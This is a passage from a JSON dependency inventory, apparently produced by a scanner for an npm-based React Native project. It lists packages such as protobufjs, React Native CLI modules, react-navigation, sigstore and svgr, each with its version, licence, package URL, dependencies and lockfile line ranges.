"StartLine": 3995, "EndLine": 4000 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/eventemitter@1.1.0", "Name": "@protobufjs/eventemitter", "Identifier": { "PURL": "pkg:npm/%40protobufjs/eventemitter@1.1.0", "UID": "4f8611cfc41e6468" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4001, "EndLine": 4006 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/fetch@1.1.0", "Name": "@protobufjs/fetch", "Identifier": { "PURL": "pkg:npm/%40protobufjs/fetch@1.1.0", "UID": "cde2d09b008ad738" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@protobufjs/aspromise@1.1.2", "@protobufjs/inquire@1.1.0" ], "Locations": [ { "StartLine": 4007, "EndLine": 4016 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/float@1.0.2", "Name": "@protobufjs/float", "Identifier": { "PURL": "pkg:npm/%40protobufjs/float@1.0.2", "UID": "4587e0c9c3df858a" }, "Version": "1.0.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4017, "EndLine": 4022 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/inquire@1.1.0", "Name": "@protobufjs/inquire", "Identifier": { "PURL": "pkg:npm/%40protobufjs/inquire@1.1.0", "UID": "8de5d0f880b55c0c" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4023, "EndLine": 4028 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/path@1.1.2", "Name": "@protobufjs/path", "Identifier": { "PURL": "pkg:npm/%40protobufjs/path@1.1.2", "UID": "ce5083e64d190831" }, "Version": "1.1.2", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4029, "EndLine": 4034 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/pool@1.1.0", "Name": "@protobufjs/pool", "Identifier": { "PURL": "pkg:npm/%40protobufjs/pool@1.1.0", "UID": "e6a2ffdefe5db296" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4035, "EndLine": 4040 } ], "AnalyzedBy": "npm" }, { "ID": "@protobufjs/utf8@1.1.0", "Name": "@protobufjs/utf8", "Identifier": { "PURL": "pkg:npm/%40protobufjs/utf8@1.1.0", "UID": "c94dd4338d8b252e" }, "Version": "1.1.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4041, "EndLine": 4046 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-clean@20.0.0", "Name": "@react-native-community/cli-clean", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-clean@20.0.0", "UID": "fc229ad29843bc22" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "execa@5.1.1", "fast-glob@3.3.3" ], "Locations": [ { "StartLine": 4128, "EndLine": 4140 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-config@20.0.0", "Name": "@react-native-community/cli-config", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config@20.0.0", "UID": "ea8330afc360de16" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "cosmiconfig@9.0.0", "deepmerge@4.3.1", "fast-glob@3.3.3", "joi@17.13.3" ], "Locations": [ { "StartLine": 4141, "EndLine": 4155 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-config-android@18.0.0", "Name": "@react-native-community/cli-config-android", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-android@18.0.0", "UID": "76ba21b4da961914" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@18.0.0", "chalk@4.1.2", "fast-glob@3.3.3", "fast-xml-parser@4.5.3" ], "Locations": [ { "StartLine": 17555, "EndLine": 17566 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-config-android@20.0.0", "Name": "@react-native-community/cli-config-android", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-android@20.0.0", "UID": "48c6fab71b00f79" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "fast-glob@3.3.3", "fast-xml-parser@4.5.3" ], "Locations": [ { "StartLine": 4156, "EndLine": 4168 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-config-apple@18.0.0", "Name": "@react-native-community/cli-config-apple", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-apple@18.0.0", "UID": "bbe498e3a43c2382" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@18.0.0", "chalk@4.1.2", "execa@5.1.1", "fast-glob@3.3.3" ], "Locations": [ { "StartLine": 17567, "EndLine": 17578 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-config-apple@20.0.0", "Name": "@react-native-community/cli-config-apple", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-config-apple@20.0.0", "UID": "5b74474bd1d6ca1f" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "execa@5.1.1", "fast-glob@3.3.3" ], "Locations": [ { "StartLine": 4169, "EndLine": 4181 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-doctor@20.0.0", "Name": "@react-native-community/cli-doctor", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-doctor@20.0.0", "UID": "a0bb433bce6434fd" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-config@20.0.0", "@react-native-community/cli-platform-android@20.0.0", "@react-native-community/cli-platform-apple@20.0.0", "@react-native-community/cli-platform-ios@20.0.0", "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "command-exists@1.2.9", "deepmerge@4.3.1", "envinfo@7.17.0", "execa@5.1.1", "node-stream-zip@1.15.0", "ora@5.4.1", "semver@7.7.3", "wcwidth@1.0.1", "yaml@2.8.1" ], "Locations": [ { "StartLine": 4182, "EndLine": 4205 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-platform-apple@20.0.0", "Name": "@react-native-community/cli-platform-apple", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-platform-apple@20.0.0", "UID": "6a6f8f9f0f28b78b" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-config-apple@20.0.0", "@react-native-community/cli-tools@20.0.0", "chalk@4.1.2", "execa@5.1.1", "fast-xml-parser@4.5.3" ], "Locations": [ { "StartLine": 4233, "EndLine": 4246 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-server-api@20.0.0", "Name": "@react-native-community/cli-server-api", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-server-api@20.0.0", "UID": "b75ec001c99a57ba" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli-tools@20.0.0", "body-parser@1.20.3", "compression@1.8.1", "connect@3.7.0", "errorhandler@1.5.1", "nocache@3.0.4", "open@6.4.0", "pretty-format@29.7.0", "serve-static@1.16.2", "ws@6.2.3" ], "Locations": [ { "StartLine": 4257, "EndLine": 4275 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-tools@18.0.0", "Name": "@react-native-community/cli-tools", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-tools@18.0.0", "UID": "7e39bfbbf9d4249" }, "Version": "18.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@vscode/sudo-prompt@9.3.1", "appdirsjs@1.2.7", "chalk@4.1.2", "execa@5.1.1", "find-up@5.0.0", "launch-editor@2.11.1", "mime@2.6.0", "ora@5.4.1", "prompts@2.4.2", "semver@7.7.3" ], "Locations": [ { "StartLine": 17579, "EndLine": 17596 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-tools@20.0.0", "Name": "@react-native-community/cli-tools", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-tools@20.0.0", "UID": "d9f05e660285a221" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@vscode/sudo-prompt@9.3.1", "appdirsjs@1.2.7", "chalk@4.1.2", "execa@5.1.1", "find-up@5.0.0", "launch-editor@2.11.1", "mime@2.6.0", "ora@5.4.1", "prompts@2.4.2", "semver@7.7.3" ], "Locations": [ { "StartLine": 4276, "EndLine": 4294 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/cli-types@20.0.0", "Name": "@react-native-community/cli-types", "Identifier": { "PURL": "pkg:npm/%40react-native-community/cli-types@20.0.0", "UID": "5da0d4a3eee4327b" }, "Version": "20.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "joi@17.13.3" ], "Locations": [ { "StartLine": 4321, "EndLine": 4330 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native-community/push-notification-ios@1.12.0", "Name": "@react-native-community/push-notification-ios", "Identifier": { "PURL": "pkg:npm/%40react-native-community/push-notification-ios@1.12.0", "UID": "48b2ba7beb1d1339" }, "Version": "1.12.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "invariant@2.2.4", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 4387, "EndLine": 4400 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/assets-registry@0.81.0", "Name": "@react-native/assets-registry", "Identifier": { "PURL": "pkg:npm/%40react-native/assets-registry@0.81.0", "UID": "801c26d868002eac" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4472, "EndLine": 4480 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/babel-plugin-codegen@0.81.0", "Name": "@react-native/babel-plugin-codegen", "Identifier": { "PURL": "pkg:npm/%40react-native/babel-plugin-codegen@0.81.0", "UID": "69a421a8b5fcdce7" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/traverse@7.28.4", "@react-native/codegen@0.81.0" ], "Locations": [ { "StartLine": 4481, "EndLine": 4493 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/codegen@0.81.0", "Name": "@react-native/codegen", "Identifier": { "PURL": "pkg:npm/%40react-native/codegen@0.81.0", "UID": "d40280764c52b70e" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "glob@7.2.3", "hermes-parser@0.29.1", "invariant@2.2.4", "nullthrows@1.1.1", "yargs@17.7.2" ], "Locations": [ { "StartLine": 4553, "EndLine": 4571 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/community-cli-plugin@0.81.0", "Name": "@react-native/community-cli-plugin", "Identifier": { "PURL": "pkg:npm/%40react-native/community-cli-plugin@0.81.0", "UID": "1ab2664a392f1170" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-native-community/cli@20.0.0", "@react-native/dev-middleware@0.81.0", "@react-native/metro-config@0.81.0", "debug@4.4.3", "invariant@2.2.4", "metro-config@0.83.3", "metro-core@0.83.3", "metro@0.83.3", "semver@7.7.3" ], "Locations": [ { "StartLine": 4572, "EndLine": 4598 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/debugger-frontend@0.81.0", "Name": "@react-native/debugger-frontend", "Identifier": { "PURL": "pkg:npm/%40react-native/debugger-frontend@0.81.0", "UID": "2283b5db013487c9" }, "Version": "0.81.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4611, "EndLine": 4619 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/dev-middleware@0.81.0", "Name": "@react-native/dev-middleware", "Identifier": { "PURL": "pkg:npm/%40react-native/dev-middleware@0.81.0", "UID": "6f0cab7ec37bc7dc" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@isaacs/ttlcache@1.4.1", "@react-native/debugger-frontend@0.81.0", "chrome-launcher@0.15.2", "chromium-edge-launcher@0.2.0", "connect@3.7.0", "debug@4.4.3", "invariant@2.2.4", "nullthrows@1.1.1", "open@7.4.2", "serve-static@1.16.2", "ws@6.2.3" ], "Locations": [ { "StartLine": 4620, "EndLine": 4641 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/gradle-plugin@0.81.0", "Name": "@react-native/gradle-plugin", "Identifier": { "PURL": "pkg:npm/%40react-native/gradle-plugin@0.81.0", "UID": "ea0f77417bc23a89" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4708, "EndLine": 4716 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/js-polyfills@0.81.0", "Name": "@react-native/js-polyfills", "Identifier": { "PURL": "pkg:npm/%40react-native/js-polyfills@0.81.0", "UID": "249e6546db3ae89a" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4717, "EndLine": 4725 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/metro-babel-transformer@0.81.0", "Name": "@react-native/metro-babel-transformer", "Identifier": { "PURL": "pkg:npm/%40react-native/metro-babel-transformer@0.81.0", "UID": "f729eaedbe6a35b2" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@react-native/babel-preset@0.81.0", "hermes-parser@0.29.1", "nullthrows@1.1.1" ], "Locations": [ { "StartLine": 4726, "EndLine": 4743 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/normalize-colors@0.73.2", "Name": "@react-native/normalize-colors", "Identifier": { "PURL": "pkg:npm/%40react-native/normalize-colors@0.73.2", "UID": "e3ae03bc30fe50c0" }, "Version": "0.73.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 7878, "EndLine": 7883 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/normalize-colors@0.81.0", "Name": "@react-native/normalize-colors", "Identifier": { "PURL": "pkg:npm/%40react-native/normalize-colors@0.81.0", "UID": "4b659ceb29412a41" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4778, "EndLine": 4783 } ], "AnalyzedBy": "npm" }, { "ID": "@react-native/virtualized-lists@0.81.0", "Name": "@react-native/virtualized-lists", "Identifier": { "PURL": "pkg:npm/%40react-native/virtualized-lists@0.81.0", "UID": "ad8f6389fc23f62c" }, "Version": "0.81.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/react@19.2.2", "invariant@2.2.4", "nullthrows@1.1.1", "react-native@0.81.0", "react@19.1.0" ], "Locations": [ { "StartLine": 18672, "EndLine": 18694 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/core@7.17.1", "Name": "@react-navigation/core", "Identifier": { "PURL": "pkg:npm/%40react-navigation/core@7.17.1", "UID": "59dc5cd0e1ee12d3" }, "Version": "7.17.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-navigation/routers@7.5.3", "escape-string-regexp@4.0.0", "fast-deep-equal@3.1.3", "nanoid@3.3.11", "query-string@7.1.3", "react-is@19.2.4", "react@19.1.0", "use-latest-callback@0.2.5", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 4791, "EndLine": 4809 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/elements@2.9.13", "Name": "@react-navigation/elements", "Identifier": { "PURL": "pkg:npm/%40react-navigation/elements@2.9.13", "UID": "75e07205a5663780" }, "Version": "2.9.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@react-navigation/native@7.2.1", "color@4.2.3", "react-native-safe-area-context@5.6.1", "react-native@0.81.0", "react@19.1.0", "use-latest-callback@0.2.5", "use-sync-external-store@1.6.0" ], "Locations": [ { "StartLine": 4837, "EndLine": 4859 } ], "AnalyzedBy": "npm" }, { "ID": "@react-navigation/routers@7.5.3", "Name": "@react-navigation/routers", "Identifier": { "PURL": "pkg:npm/%40react-navigation/routers@7.5.3", "UID": "f070c00a341d51fe" }, "Version": "7.5.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "nanoid@3.3.11" ], "Locations": [ { "StartLine": 4895, "EndLine": 4903 } ], "AnalyzedBy": "npm" }, { "ID": "@sideway/address@4.1.5", "Name": "@sideway/address", "Identifier": { "PURL": "pkg:npm/%40sideway/address@4.1.5", "UID": "c00b18a5a623d424" }, "Version": "4.1.5", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@hapi/hoek@9.3.0" ], "Locations": [ { "StartLine": 4922, "EndLine": 4931 } ], "AnalyzedBy": "npm" }, { "ID": "@sideway/formula@3.0.1", "Name": "@sideway/formula", "Identifier": { "PURL": "pkg:npm/%40sideway/formula@3.0.1", "UID": "7e9d3596b4ffce18" }, "Version": "3.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4932, "EndLine": 4938 } ], "AnalyzedBy": "npm" }, { "ID": "@sideway/pinpoint@2.0.0", "Name": "@sideway/pinpoint", "Identifier": { "PURL": "pkg:npm/%40sideway/pinpoint@2.0.0", "UID": "747cb83ab19f3906" }, "Version": "2.0.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4939, "EndLine": 4945 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/bundle@4.0.0", "Name": "@sigstore/bundle", "Identifier": { "PURL": "pkg:npm/%40sigstore/bundle@4.0.0", "UID": "174a86bfc55a1b9" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/protobuf-specs@0.5.0" ], "Locations": [ { "StartLine": 13882, "EndLine": 13894 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/core@3.0.0", "Name": "@sigstore/core", "Identifier": { "PURL": "pkg:npm/%40sigstore/core@3.0.0", "UID": "ff1d30bf956703d3" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13895, "EndLine": 13902 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/protobuf-specs@0.5.0", "Name": "@sigstore/protobuf-specs", "Identifier": { "PURL": "pkg:npm/%40sigstore/protobuf-specs@0.5.0", "UID": "49b420df56bd905f" }, "Version": "0.5.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 13903, "EndLine": 13912 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/sign@4.0.1", "Name": "@sigstore/sign", "Identifier": { "PURL": "pkg:npm/%40sigstore/sign@4.0.1", "UID": "a57594d6c89bf13" }, "Version": "4.0.1", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0", "make-fetch-happen@15.0.2", "proc-log@5.0.0", "promise-retry@2.0.1" ], "Locations": [ { "StartLine": 13913, "EndLine": 13928 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/tuf@4.0.0", "Name": "@sigstore/tuf", "Identifier": { "PURL": "pkg:npm/%40sigstore/tuf@4.0.0", "UID": "6ca04e115d754463" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/protobuf-specs@0.5.0", "tuf-js@4.0.0" ], "Locations": [ { "StartLine": 13929, "EndLine": 13940 } ], "AnalyzedBy": "npm" }, { "ID": "@sigstore/verify@3.0.0", "Name": "@sigstore/verify", "Identifier": { "PURL": "pkg:npm/%40sigstore/verify@3.0.0", "UID": "32176d62ebaca59d" }, "Version": "3.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0" ], "Locations": [ { "StartLine": 13941, "EndLine": 13953 } ], "AnalyzedBy": "npm" }, { "ID": "@sinclair/typebox@0.27.8", "Name": "@sinclair/typebox", "Identifier": { "PURL": "pkg:npm/%40sinclair/typebox@0.27.8", "UID": "f1a3e3ed0fccdea5" }, "Version": "0.27.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4946, "EndLine": 4951 } ], "AnalyzedBy": "npm" }, { "ID": "@sinonjs/commons@3.0.1", "Name": "@sinonjs/commons", "Identifier": { "PURL": "pkg:npm/%40sinonjs/commons@3.0.1", "UID": "a2b98918e41a56cf" }, "Version": "3.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "type-detect@4.0.8" ], "Locations": [ { "StartLine": 4952, "EndLine": 4960 } ], "AnalyzedBy": "npm" }, { "ID": "@sinonjs/fake-timers@10.3.0", "Name": "@sinonjs/fake-timers", "Identifier": { "PURL": "pkg:npm/%40sinonjs/fake-timers@10.3.0", "UID": "6da376b830351b66" }, "Version": "10.3.0", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sinonjs/commons@3.0.1" ], "Locations": [ { "StartLine": 4961, "EndLine": 4969 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-add-jsx-attribute@8.0.0", "Name": "@svgr/babel-plugin-add-jsx-attribute", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-add-jsx-attribute@8.0.0", "UID": "ffb4c5caf11b4944" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 4970, "EndLine": 4985 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", "Name": "@svgr/babel-plugin-remove-jsx-attribute", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-attribute@8.0.0", "UID": "91970c4a5ff02e03" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 4986, "EndLine": 5001 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "Name": "@svgr/babel-plugin-remove-jsx-empty-expression", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "UID": "3960bf1a11e63ab2" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5002, "EndLine": 5017 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "Name": "@svgr/babel-plugin-replace-jsx-attribute-value", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "UID": "8e93b46ecc545908" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5018, "EndLine": 5033 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-svg-dynamic-title@8.0.0", "Name": "@svgr/babel-plugin-svg-dynamic-title", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-svg-dynamic-title@8.0.0", "UID": "e9a0e0ca804bbf3f" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5034, "EndLine": 5049 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-svg-em-dimensions@8.0.0", "Name": "@svgr/babel-plugin-svg-em-dimensions", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-svg-em-dimensions@8.0.0", "UID": "6b6ab181cb54b434" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5050, "EndLine": 5065 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-transform-react-native-svg@8.1.0", "Name": "@svgr/babel-plugin-transform-react-native-svg", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-transform-react-native-svg@8.1.0", "UID": "53d4662eddfe92a7" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5066, "EndLine": 5081 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-plugin-transform-svg-component@8.0.0", "Name": "@svgr/babel-plugin-transform-svg-component", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-plugin-transform-svg-component@8.0.0", "UID": "e8457ee7b3ff63af" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4" ], "Locations": [ { "StartLine": 5082, "EndLine": 5097 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/babel-preset@8.1.0", "Name": "@svgr/babel-preset", "Identifier": { "PURL": "pkg:npm/%40svgr/babel-preset@8.1.0", "UID": "b0762b57e7756629" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@svgr/babel-plugin-add-jsx-attribute@8.0.0", "@svgr/babel-plugin-remove-jsx-attribute@8.0.0", "@svgr/babel-plugin-remove-jsx-empty-expression@8.0.0", "@svgr/babel-plugin-replace-jsx-attribute-value@8.0.0", "@svgr/babel-plugin-svg-dynamic-title@8.0.0", "@svgr/babel-plugin-svg-em-dimensions@8.0.0", "@svgr/babel-plugin-transform-react-native-svg@8.1.0", "@svgr/babel-plugin-transform-svg-component@8.0.0" ], "Locations": [ { "StartLine": 5098, "EndLine": 5123 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/core@8.1.0", "Name": "@svgr/core", "Identifier": { "PURL": "pkg:npm/%40svgr/core@8.1.0", "UID": "1f6bc883498762a4" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@svgr/babel-preset@8.1.0", "camelcase@6.3.0", "cosmiconfig@8.3.6", "snake-case@3.0.4" ], "Locations": [ { "StartLine": 5124, "EndLine": 5143 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/hast-util-to-babel-ast@8.0.0", "Name": "@svgr/hast-util-to-babel-ast", "Identifier": { "PURL": "pkg:npm/%40svgr/hast-util-to-babel-ast@8.0.0", "UID": "14cf997983a2ce8c" }, "Version": "8.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/types@7.28.4", "entities@4.5.0" ], "Locations": [ { "StartLine": 5182, "EndLine": 5198 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/plugin-jsx@8.1.0", "Name": "@svgr/plugin-jsx", "Identifier": { "PURL": "pkg:npm/%40svgr/plugin-jsx@8.1.0", "UID": "31f8e49d9476241d" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@babel/core@7.28.4", "@svgr/babel-preset@8.1.0", "@svgr/core@8.1.0", "@svgr/hast-util-to-babel-ast@8.0.0", "svg-parser@2.0.4" ], "Locations": [ { "StartLine": 5199, "EndLine": 5220 } ], "AnalyzedBy": "npm" }, { "ID": "@svgr/plugin-svgo@8.1.0", "Name": "@svgr/plugin-svgo", "Identifier": { "PURL": "pkg:npm/%40svgr/plugin-svgo@8.1.0", "UID": "2f5287ec4de14b78" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@svgr/core@8.1.0", "cosmiconfig@8.3.6", "deepmerge@4.3.1", "svgo@3.3.2" ], "Locations": [ { "StartLine": 5221, "EndLine": 5241 } ], "AnalyzedBy": "npm" }, { "ID": "@tootallnate/once@1.1.2", "Name": "@tootallnate/once", "Identifier": { "PURL": 